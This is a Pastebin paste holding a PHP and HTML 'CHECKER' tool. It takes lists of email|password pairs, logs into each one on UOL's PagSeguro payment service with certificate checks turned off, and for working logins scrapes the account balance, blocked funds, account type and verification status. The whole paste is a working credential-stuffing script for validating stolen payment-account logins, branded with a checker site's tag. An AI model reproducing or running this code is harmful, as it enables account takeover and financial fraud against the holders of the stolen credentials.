Advertisement
Guest User

Untitled

a guest
Feb 7th, 2018
452
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.86 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <!--
  3. To change this license header, choose License Headers in Project Properties.
  4. To change this template file, choose Tools | Templates
  5. and open the template in the editor.
  6. -->
  7. <html>
  8. <head>
  9. <!-- Latest compiled and minified CSS -->
  10. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
  11.  
  12. <!-- Optional theme -->
  13. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap-theme.min.css" integrity="sha384-fLW2N01lMqjakBkx3l/M9EahuwpSfeNvV63J5ezn3uZzapT0u7EYsXMjQV+0En5r" crossorigin="anonymous">
  14.  
  15. <!-- Latest compiled and minified JavaScript -->
  16. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
  17. <style>
  18. body{
  19. background-color: #E3E3E3;
  20. }
  21. textarea{
  22. width: 700px;
  23. height: 300px;
  24. }
  25. #enviar{
  26. width: 30%;
  27. }
  28. *{
  29. margin-top: 2%;
  30. }
  31. </style>
  32. <title>CHECKER</title>
  33. <meta charset="UTF-8">
  34. </head>
  35. <body>
  36. <center>
  37. <form method="POST" id="FORM">
  38. <textarea id="lista" placeholder="Email|senha"></textarea>
  39. <br>
  40. <br>
  41. <input class="btn btn-success" type="submit" id="enviar" value="TESTAR AS CC'S">
  42. </form>
  43. </center>
  44. </body>
  45. </html>
  46. <?php
  47. set_time_limit(0);
  48. error_reporting(0);
  49. function getStr($string, $start, $end) {
  50. $str = explode($start, $string);
  51. $str = explode($end, $str[1]);
  52. return $str[0];
  53. }
  54. $lista = $_GET['lista'];
  55. $separador = explode("|", $lista);
  56. $email = $separador[0];
  57. $senha = $separador[1];
  58.  
  59.  
  60. $ch = curl_init();
  61. curl_setopt($ch, CURLOPT_URL, "https://acesso.uol.com.br/login.html?skin=ps");
  62. curl_setopt($ch, CURLOPT_HEADER, 1);
  63. curl_setopt($ch, CURLOPT_NOBODY, false);
  64. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  65. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  66. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  67. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  68. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  69. curl_setopt($ch, CURLOPT_COOKIESESSION, false );
  70. curl_setopt($ch, CURLOPT_ENCODING, 'gzip');
  71. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookies/pagseguro.txt');
  72. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookies/pagseguro.txt');
  73. curl_setopt($ch, CURLOPT_REFERER, 'https://acesso.uol.com.br/login.html?skin=ps');
  74. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  75. $d1 = curl_exec($ch);
  76. $token = getStr($d1,'type="hidden" name="acsrfToken" value="','"');
  77. curl_setopt($ch, CURLOPT_URL, "https://acesso.uol.com.br/login.html?skin=ps");
  78. curl_setopt($ch, CURLOPT_HEADER, 1);
  79. curl_setopt($ch, CURLOPT_NOBODY, false);
  80. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  81. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  82. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  83. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  84. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  85. curl_setopt($ch, CURLOPT_COOKIESESSION, false );
  86. curl_setopt($ch, CURLOPT_ENCODING, 'gzip');
  87. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookies/pagseguro.txt');
  88. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookies/pagseguro.txt');
  89. curl_setopt($ch, CURLOPT_REFERER, 'https://acesso.uol.com.br/login.html?skin=ps');
  90. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  91. curl_setopt($ch, CURLOPT_POST, 1);
  92. curl_setopt($ch, CURLOPT_POSTFIELDS, 'dest=REDIR%7Chttps%3A%2F%2Fpagseguro.uol.com.br%2F&deviceId=&skin=ps&user='.$email.'&pass='.$senha.'&entrar=');
  93. $d2 = curl_exec($ch);
  94. curl_close($ch);
  95. if(stripos($d2, 'Comprar')){
  96. $ch = curl_init();
  97. curl_setopt($ch, CURLOPT_URL, "https://pagseguro.uol.com.br/account/wallet.jhtml");
  98. curl_setopt($ch, CURLOPT_HEADER, 1);
  99. curl_setopt($ch, CURLOPT_NOBODY, false);
  100. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  101. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  102. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  103. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  104. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  105. curl_setopt($ch, CURLOPT_COOKIESESSION, false );
  106. curl_setopt($ch, CURLOPT_ENCODING, 'gzip');
  107. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookies/pagseguro.txt');
  108. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookies/pagseguro.txt');
  109. curl_setopt($ch, CURLOPT_REFERER, 'https://pagseguro.uol.com.br/login.jhtml');
  110. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  111. $d3 = curl_exec($ch);
  112. $token = getStr($d3,'type="hidden" name="acsrfToken" value="','"');
  113. curl_setopt($ch, CURLOPT_URL, "https://pagseguro.uol.com.br/login.jhtml");
  114. curl_setopt($ch, CURLOPT_HEADER, 1);
  115. curl_setopt($ch, CURLOPT_NOBODY, false);
  116. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  117. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  118. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  119. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  120. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  121. curl_setopt($ch, CURLOPT_COOKIESESSION, false );
  122. curl_setopt($ch, CURLOPT_ENCODING, 'gzip');
  123. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookies/pagseguro.txt');
  124. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookies/pagseguro.txt');
  125. curl_setopt($ch, CURLOPT_REFERER, 'https://pagseguro.uol.com.br/login.jhtml');
  126. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  127. curl_setopt($ch, CURLOPT_POST, 1);
  128. curl_setopt($ch, CURLOPT_POSTFIELDS, 'dest=+REDIR%7Chttps://pagseguro.uol.com.br/hub.jhtml&skin=&acsrfToken='.$token.'&user='.$email.'&pass='.$senha.'');
  129. $d4 = curl_exec($ch);
  130.  
  131. if(stripos($d4, '<div class="logged-user-info">')){
  132.  
  133. if(strpos($d4, 'verificar conta')){
  134. $verificada = "Não";
  135. }else{
  136. $verificada = "Sim";
  137. }
  138. $tipo = getStr($d4,'href="/account/viewDetails.jhtml" title="','"');
  139. $disponivel = getStr($d4,'<dd id="accountBalance" class="positive">','</dd>');
  140. if ($disponivel == false) {
  141. $disponivel = "0,00";
  142. }
  143. $bloqueado = getStr($d4,'<dd id="accountBlocked" class="neutral">','</dd>');
  144. if ($bloqueado == false) {
  145. $bloqueado = "0,00";
  146. }
  147. $receber = getStr($d4,'<dd id="accountEscrow" class="neutral">','</dd>');
  148. if ($receber == false) {
  149. $receber = "0,00";
  150. }
  151. echo "<font color='#04B431' style='font-weight: bold;'>#APROVADA @CHKTOOL.ML</font> <font color='00FF00'>$lista</font>
  152. | Disponivel: R$ $disponivel | Receber: $receber | Bloqueado: $bloqueado | Tipo: $tipo | Verificada: $verificada";
  153. }else{
  154. echo "<font color='red' style='font-weight: bold;'>#REPROVADA @PLACECHK</font> $lista";
  155. }
  156. }
  157. if (file_exists(getcwd().'/cookies/pagseguro.txt')) {
  158. unlink(getcwd().'/cookies/pagseguro.txt');
  159. }
  160.  
  161. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement